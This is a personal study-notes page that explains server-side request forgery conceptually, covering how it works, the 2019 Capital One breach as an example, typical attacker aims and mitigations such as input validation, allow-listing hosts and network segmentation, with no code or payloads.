adam's notes

Server-Side Request Forgery (SSRF)

Server-side request forgery (SSRF) is a type of web application security vulnerability that occurs when an attacker can send unauthorized requests from a vulnerable web application to other internal or external systems to gain unauthorized access.

  • threat actor takes advantage of the trust established between the server and the resources it can access, including itself
  • causes a server application to process an arbitrary request that targets another service
  • target service could be
    • another application running on the same host
    • or a service running on a remote host
  • exploits both the lack of authentication between the internal servers and services
  • relies on weak input validation
    • allows the attacker to submit arbitrary requests
  • often targeted against cloud infrastructure
    • where web server is only the public-facing component of a deeper processing chain
  • typically involves an attacker exploiting the web application’s ability to send HTTP requests to other systems,
    • which are then abused to instruct “hidden” internal or external systems to provide the attacker with access to protected features or to steal information

Example

A well-documented example of SSRF occured in the 2019 CaptialOne breach.
https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

How it Works

  • web application comprises:
    • multiple layers of servers
    • with a client interface
    • middleware logic layers
    • and a database layer
  • Requests initiated from the client interface (a web form) are likely to require multiple requests and responses between the middleware and back-end servers
    • will be implemented as HTTP header requests and responses between each server
  • SSRF is a means of accessing these internal servers by causing the public server to execute requests on them
  • manipulated request is made with the server’s privilege level
  • works by manipulating the input of a vulnerable web application to cause it to send an HTTP request to a server of the attacker’s choice
    • attacker can use this ability to perform a range of malicious activities

Tip

PortSwigger (the maintainers of Burp Suite) have published an excellent technical overview of SSRF.
https://portswigger.net/web-security/ssrf

Common Techniques Used to Exploit SSRF Vulns

  • An attacker uses SSRF to access internal resources on a network, such as databases or file systems, that should be inaccessible directly from the Internet
  • An attacker can use SSRF to access other web applications to steal data or launch attacks against other systems
  • An attacker can use SSRF to scan the internal network for open ports or other vulnerable services
    • then used to launch further attacks

Mitigation

  • input validation
    • Ensure that all user input is properly validated and sanitized to prevent attackers from manipulating requests
  • whitelist hosts
    • Web applications should only be allowed to access trusted hosts and block all other requests by default
  • Firewall and network segmentation
    • Network segmentation can prevent unauthorized access to internal systems
    • combine with firewalls to block traffic from unauthorized sources
  • Secure coding practices
    • using well established and trusted libraries
    • avoiding user-controlled data in requests
    • implement safe configuration settings

Graph View

Backlinks